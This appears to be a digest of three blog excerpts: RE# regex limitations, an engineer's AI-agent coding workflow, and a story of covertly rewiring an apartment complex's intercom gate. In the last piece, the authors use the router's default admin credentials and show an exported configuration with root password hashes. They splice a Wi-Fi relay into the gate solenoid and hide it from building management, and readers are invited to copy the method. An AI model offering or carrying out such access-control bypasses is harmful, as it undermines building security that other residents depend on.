no capture groups - RE# returns match boundaries only, not sub-group captures. this isn’t impossible - captures are a post-match operation that can be layered on top. the reason is we haven’t found the right way to do it yet. with intersection and complement, every subexpression would naively become a capture group - (a.*&.*b) has two implicit groups, and complement creates more. in traditional regex, (?:…) exists to opt out of capturing, but the more i think about it the more ?: feels like a historical mistake - it makes the default behavior (capturing) the one that opts you into a much slower algorithm, even when you don’t need it. i’d rather get the design right than ship something awkward.
in the meantime, you can use another engine to extract captures post-match - with \A anchors on the already-known match boundaries, the overhead isn’t that bad.
no lazy quantifiers - .*? isn’t supported. RE# uses leftmost-longest (POSIX) semantics, which is the mathematically unambiguous interpretation. lazy quantifiers are a backtracking concept that doesn’t translate to this model.
capture groups may come eventually, but lazy quantifiers are a deliberate architectural choice. if you need captures today, use regex. if you need the properties RE# offers (boolean operators, lookarounds, true-linear all-matches, POSIX semantics), these limitations are unlikely to matter.
as a side note - to put RE#’s boolean operators to practical use, i built a grep tool called re. the main thing it adds over (rip)?grep is multi-term boolean search with scoping - require multiple patterns to co-occur on the same line, paragraph, or within N lines of each other:
# unsafe code with unwrap co-located within 5 lines
re --near 5 -a unsafe -a unwrap src/
# list all files both containing serde and async
re --scope file -a serde -a async src/
you can also use full RE# patterns - re '([0-9a-f]+)&(_*[0-9]_*)&(_*[a-f]_*)' src/ finds hex strings containing both a digit and a letter. you could do this with a pipeline of greps, but it's one pass with all the context information preserved.
it’s still early, but i’ve been using it daily and i think there’s a lot of potential here.
i think i’ll rest for a bit after this. i can only do 80-hour weeks for so long, and even though i have a lot more to share, it’ll have to wait. there’s also a paper that’s been conditionally accepted at PLDI - i’ll write about it properly once it’s out. the rust RE# itself isn’t quite ready for a formal 1.0 announcement yet, but we’re getting closer.
...
It’s been about 6 weeks since I joined Tano, and this is what my commit history looks like:
Commits are a terrible metric for output, but they’re the most visible signal I have. Something real changed in how I work, and the commit count is a side effect.
So, what has changed?
When I joined Tano, I was making every pull request by hand. Stage changes, write the commit message, craft the PR description, push, create the PR on GitHub. Standard process, it was fine.
It took me a while to realize this is grunt work. I was so used to doing it that I’d never questioned it.
That was the first real shift: I’m not the implementer anymore. I’m the manager of agents doing the implementation. And managers automate their team’s grunt work.
Then I wrote my first Claude Code skill: /git-pr.
It does everything I used to do, except it does it better. The PR descriptions are more thorough than what I’d write, because it reads the full diff and summarises the changes properly. I’d gotten so used to the drudgery that I’d stopped noticing it was drudgery.
The time saved matters, but the real unlock was the mental overhead removed. Every PR used to be a small context switch: stop thinking about the code, start thinking about how to describe the code. Now I type /git-pr and move on to the next thing.
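For flavor, here is roughly what such a skill collapses into (a sketch, not the actual /git-pr; a real agent would generate the title and body from the full diff rather than use fixed strings):

import subprocess

def sh(*args: str) -> None:
    subprocess.run(args, check=True)

# an agent would derive these from `git diff`; fixed strings here for brevity
title = "feat: describe the change"
body = "Summary of what changed and why, written from the full diff."

sh("git", "add", "-A")
sh("git", "commit", "-m", title)
sh("git", "push", "-u", "origin", "HEAD")
sh("gh", "pr", "create", "--title", title, "--body", body)  # GitHub CLI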
Reviewing changes had this annoying loop.
Preview changes locally, go away from what I’m working on, kill the dev server, restart it on the new branch, check it all works, review the code.
The server build took about a minute, which was agonisingly long when I was mid-context-switch. Long enough to break focus, too short to do anything useful.
I switched the build to SWC, and server restarts dropped to under a second. This sparked joy.
It sounds like a small change. It wasn’t. Sub-second restarts mean you never leave the flow. Save a file, the server’s already up, check the preview. There’s no gap where your attention drifts. It’s the difference between a conversation with awkward pauses and one that flows naturally.
Before this, I checked every UI change. Preview locally, eyeball it, decide if it matches what I expected. It worked, but it meant I was a bottleneck on every feature.
After the Chrome extension kept crashing, I switched to the preview feature in Claude Code. It lets the agent set up a preview, persist session data, and see how the UI actually looks.
I wired it into the workflow: a change isn’t “done” until the agent has verified the UI itself. That meant I could delegate verification and only step in for final review — which also meant agents could run much longer without oversight. They’d catch their own mistakes. That mattered more than I realized at the time.
Fast rebuilds and automated previews made another friction visible: I could only comfortably work on one thing at a time.
I was reviewing PRs from other agents and teammates. The workflow was painful: check out the PR branch on main, rebuild, test. But that would mess with my uncommitted changes. So I’d stash, checkout, rebuild, test, switch back, pop the stash. Or create a worktree manually, set it up, try to run the preview - only to find the ports clashing with my other running server.
Our app has a frontend and a backend, each needing its own port. Every worktree shared the same environment variables, so they’d all try to bind to the same ports. Running two things at once was a fight.
I built a system around this. Whenever a worktree is created, every server gets assigned ports from a unique range. No collisions. I could run ten previews simultaneously if I wanted.
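A sketch of how that can work (my guess at the mechanics, not the actual implementation; the env file name is made up): hash the worktree path into a stable slot and derive non-overlapping ports from it.

import hashlib, pathlib, sys

worktree = pathlib.Path(sys.argv[1]).resolve()
slot = int(hashlib.sha256(str(worktree).encode()).hexdigest(), 16) % 100
base = 10_000 + slot * 10            # 10 ports per worktree, no overlap
env = worktree / ".env.ports"        # hypothetical filename
env.write_text(f"FRONTEND_PORT={base}\nBACKEND_PORT={base + 1}\n")
print(f"{worktree.name}: frontend={base} backend={base + 1}")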
I went from getting overwhelmed by two parallel branches to running five worktrees at once. My create loop changed: fire off multiple agents on separate worktrees, each building a different feature. They’d only stop once they’d verified the UI themselves.
I’d be heavily involved in planning. Then I’d disappear until code review. Agents catching their own mistakes mattered a lot more with five running at once.
Reviewing got smoother too. No faffing around with setup. No rebuilding. No port conflicts. Just: read, verify, merge. Next.
My role has changed. I used to derive joy from figuring out a complicated problem, spending hours crafting the perfect UI. I still do that sometimes, but a lot less now. What’s become more fun is building the infrastructure that makes the agents effective. Being a manager of a team of ten versus being a solo dev. And like any good manager, you get to claim credit for all the work your “team” does.
These aren’t glamorous problems. They’re plumbing. But plumbing determines whether you’re in flow or wrestling your environment.
The highest-leverage work I’ve done at Tano hasn’t been writing features. It’s been building the infrastructure that turned a trickle of commits into a flood.
Each of these stages removed a different kind of friction:
/git-pr removed the friction of formatting - turning code changes into a presentable PR.
SWC removed the friction of waiting - the dead time between making a change and seeing it.
The preview removed the friction of verifying changes - I could quickly see what’s happening.
The worktree system removed the friction of context-switching - juggling multiple streams of work without them colliding.
And each time I removed one, the next became visible. When PRs were effortless, I noticed I was wasting time on rebuilds. When rebuilds were instant, I noticed I couldn’t run things in parallel. Classic theory of constraints — fix one, and the system immediately shows you the next one.
The nature of the work changed. I’m not “using a tool that writes code.” I’m in a tight loop: kick off a task, the agent writes code, I check the preview, read the diff, give feedback or merge, kick off the next task. The feedback loop is so tight that there’s no gap for my attention to leak out.
Building things is a different kind of fun now — it’s so fast that the game becomes improving the speed. How much faster can I go? When the loop is tight enough, engineering becomes the entertainment.
...
Read the original on neilkakkar.com »
My friend Frank (not his real name) hosts a lot of guests at his apartment, and his complex’s intercom is what ushers them inside. You’ve probably seen them before; they look like this:
Up until recently, guests could find Frank’s number in the system and give it a call. If Frank recognized the people on the line, he would press a number on his dial pad, which the controller would interpret as a signal to unlock the gate.
Then, management got lazy. The complex Frank lives in failed to renew their intercom’s cellular service, so it could no longer make calls for the voice system. Even after months of asking his landlord to fix it, nothing was done.
My other friend Hazel and I arrived to visit Frank during this outage period, and he asked us to see what we could do. Here’s what we saw:
Closer inspection of the top box gave a promising result: it was unlocked! The general layout of the box is as follows:
It was impossible to ignore the massive Wi-Fi/cell router in the top corner with its admin password printed right on it (not pictured). Of course, I had to investigate.
I quickly found the network and entered the login credentials shown. Of course, they weren’t changed from the defaults. I had full admin access to the router, which was awesome, until I realized that I couldn’t do very much with its basic, locked-down interface. This almost ended my exploration, but then I realized: what about SSH?
AT&T, the company that makes the routers for Doorking, is smarter than a bag of rocks in that SSH is protected on their router. Sadly for them, they lose to the bag of rocks in providing a way to download their entire system configuration from the web interface, containing a way to reset the root password to whatever you want:
# This file is an exported configuration from NetComm Bovine platform based device.
# Private fields are encrypted but any configuraiton entry can be manually replaced by
# a plain-text variable or URI-encoded text.
admin.firewall.enable;1
admin.local.enable_http;1
admin.local.enable_https;1
admin.local.ssh_enable;1
admin.local.telnetenable;1
admin.open.port;
admin.password;
admin.user.admin;$aM9VdmCoc5vuekVU70/Gl8iJTOujxMQo
admin.user.root;$DDDgp0GJy6nB29UX7pDlrUUKDkWYqp84
Wow. I now see why router vulnerabilities are so common.
This was certainly a promising avenue, but we realized something: even if we gained code execution on the router, we would have to figure out its custom serial protocol to even have a chance at talking to the main control box. This wasn’t something Hazel and I wanted to spend our entire vacation doing, so we decided to look elsewhere.
Looking at the other terminals within the box, we saw the PH LINE phone connectors for each system. This was promising, since Frank’s existing intercom system used DTMF signals to open the gate back when it was working.
However, it was unlikely that the main control box would blindly accept any phone commands while not actively listening for them after a user had asked it to. It would’ve been possible to test this hypothesis, but we were again left with the reality of extremely limited debugging capabilities, in addition to minimal knowledge of phone signaling systems.
Hazel and I knew there had to be some vulnerability in the system that would allow us to inject our own commands into the gate control system. We were correct, but we first needed a change in perspective. Our initial assumption was that we needed to take top-down control over the system to make it do what we wanted. After our previous failures to do so, we changed our goal to take bottom-up control of the system: undermining it at its core.
We expanded our search past the voice box to the main junction box that routed the wires between the voice box and the (inaccessible) main controller. After unscrewing two flathead screws, we were met with an interesting surprise: an extra cable we didn’t expect. Tracing the cable led to a revelation: the main control box controls the solenoid, the mechanical device responsible for unlocking the gate, through the junction box!
Having access to the solenoid control wire changed our approach dramatically. Solenoids are just electromagnets that have two states: unpowered (locked) and powered (unlocked); no security measures, no protocols to snoop. With this easy access point, we could just apply our own power to the solenoid to unlock the gate. In addition, the 12 volt DC auxiliary power from a terminal in the voice box would be perfect to power a microcontroller.
Here is the plan we came up with:
* Split the wire that runs to the lock housing and triggers the solenoid. Connect the split end to a Wi-Fi-enabled ESP32 relay board.
* Write firmware in Rust to turn the ESP32 into a Matter client that we can connect to Frank’s Apple Home.
* Hide the board inside the little junction box, conveniently placed there by the building for maximum discreetness.
* Power the board by plugging a power cable into the Doorking voice box and running the cable into the junction.
It was time to order parts. Thankfully Hazel found an ESP32 relay board that did exactly what we wanted, having two relays to control the solenoid. The circuit ended up looking like this:
This setup ensures that if our circuit were to fail, the system would still remain fully functional since the gate control commands are passed through when no power is applied to the relay.1
Once we had the hardware set, next up was the software. We chose to use a Matter library written in Rust with specializations for the ESP32. This would allow us to use an open standard (with freely accessible specs, no filetype:pdf digging necessary!) to connect to Frank’s Apple Home setup.
The software can be described by this state machine:
It’s pretty simple. Startup and connect to the network. Once connected, start listening for commands from the home. When instructed, unlock the gate for a certain amount of time (user configurable with a default time of ten seconds), then re-lock the gate. Importantly, the software will never let the gate stay unlocked indefinitely, ensuring the system remains secure. You can look at the code yourself here.
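Here is the re-lock logic as a simplified sketch (illustrative Python; the real firmware is Rust on the ESP32, with the relay and Matter plumbing stubbed out here):

import threading

DEFAULT_UNLOCK_SECS = 10.0  # user-configurable default

class GateLock:
    def __init__(self, set_relay):
        self.set_relay = set_relay          # callable: True = unlocked
        self._timer = None

    def unlock(self, seconds: float = DEFAULT_UNLOCK_SECS) -> None:
        if self._timer:
            self._timer.cancel()            # restart the window, don't stack timers
        self.set_relay(True)
        self._timer = threading.Timer(seconds, self.lock)
        self._timer.daemon = True
        self._timer.start()                 # the gate can never stay open forever

    def lock(self) -> None:
        self.set_relay(False)

gate = GateLock(lambda on: print("relay", "ON" if on else "OFF"))
gate.unlock()   # relay ON, then OFF again after 10 s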
One particularly infuriating issue we encountered during development was the ESP32’s very limited RAM space. Launching both the Wi-Fi and Bluetooth stacks together would almost always cause memory corruption due to overallocation, leading to a hard reset after invalid memory access. The Matter implementation we used utilized the ESP32’s older Bluedroid Bluetooth stack instead of the newer NimBLE, making the problem even worse. After manually tweaking the size of the stack for a long time, even with the help of Claude Code we were unable to get it stable. However, there was a solution in store: only enable either Wi-Fi or Bluetooth, and have Claude dump a bunch of memory-saving config settings into sdkconfig.defaults. Bluetooth is only necessary for the provisioning process, and Wi-Fi is only necessary for regular operation. There is a small window during the provisioning process where both need to be active, but this is short enough to not cause problems. Now, in normal operation the ESP32 immediately disables Bluetooth, eliminating the problem.
Once we handled all of the edge cases, the device showed up in Apple Home!
Fun fact, you can set the manufacturer information to whatever you’d like:
Once we had the software running perfectly, we moved on to deploying the device. Luckily, the board we bought fit perfectly into the small junction box that started us down this path, so it would be completely invisible to anyone who passed by. Hazel had already run power lines from the voice box to the junction box, and we had already purchased a Wi-Fi extender to ensure the signal was strong, so all we needed to do was hook things in. After a lot of careful splicing by Hazel, it was installed! We connected power in the voice box, aaaaannnnnndddddd… nothing. No power.
This was bad. Something had bucked our expectations, but we had no idea what. Frank didn’t have a multimeter, so we were stuck trying to figure out if there was a fray in the power wire, or if there was maybe a blown component on our board, or any number of other potential problems. Eventually I got an idea: Frank owns a cordless drill. After rummaging around in his tool closet, I found what I was looking for: a cordless drill battery, rated to output 20 volts. I ran downstairs, connected it to the power wires, and eureka! It worked! The board fired up and connected to Apple Home. This was a wild feeling, being able to unlock the gate before I even got to it.
While it felt really good to know that the project could work, we needed to figure out what was going on with the power. After some digging I came across the service manual for the voice box, and I found something that should’ve been obvious: the 12 volt aux port was an input, not an output, for power sources such as solar panels. It was frustrating for us to discover this fact, but at least our board was functional. After a quick search I ordered a rectifying regulator that converts the 18 volt AC input to 12 volts DC. Shipping took forever, but once it arrived it fit right in alongside the ESP32 board inside the junction box. I connected it to the known-working AC power for the voice box, and power started flowing! We closed everything up, and we were done.
Hazel and I are super proud of our little box of secrets, and Frank couldn’t be happier. With his newfound capability to unlock the gate through Apple Home,
* Frank can unlock the building gate for himself with an easy tap on his phone, or remotely let guests in again without the intercom.
* Frank’s Home guests can now unlock both the building gate and his apartment’s smart lock from the Home app; it’s now an all-in-one way for them to easily enter his apartment.
As a bonus, the assembly is very discreet: it’s just one ESP32 and a small power device hidden in a screw-secured junction box that doesn’t interfere with the building’s primary access control system, giving it a much better chance of avoiding discovery.
This was such a fun project to work on, and it allowed me to dip my toes into circuit hacking, something I don’t get to do nearly enough. The components for this project are all super simple, so if you’re in the same position as Frank, give it a try! Tag me on Twitter if you get it working!
...
Read the original on jackhogan.me »